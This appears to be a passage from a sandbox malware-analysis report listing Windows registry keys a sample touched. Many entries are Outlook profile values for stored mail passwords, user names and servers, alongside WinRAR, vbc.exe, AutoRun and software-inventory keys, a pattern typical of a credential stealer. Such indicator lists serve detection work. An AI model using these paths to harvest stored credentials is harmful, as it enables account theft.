HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP Server URL
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Port
HKEY_CURRENT_USER\Software\WinRAR\Client Hash
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\vbc.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index36
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\26F47677
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1045AB6F-6151-3634-8C2C-EE308AA1A6A7}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1045AB6F-6151-3634-8C2C-EE308AA1A6A7}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2608539\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2689322\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2723430\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2821701\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2845370\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2890375\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{23daf363-3020-4059-b3ae-dc4ad39fed19}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{23daf363-3020-4059-b3ae-dc4ad39fed19}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83216022FF}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83216022FF}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218074F0}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218074F0}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5ECE64C9-F5B3-4914-B1F2-23D46548B7E3}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5ECE64C9-F5B3-4914-B1F2-23D46548B7E3}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{65AD78AD-D23D-3A1E-9305-3AE65CD522C2}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{65AD78AD-D23D-3A1E-9305-3AE65CD522C2}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3122661\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3127233\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName
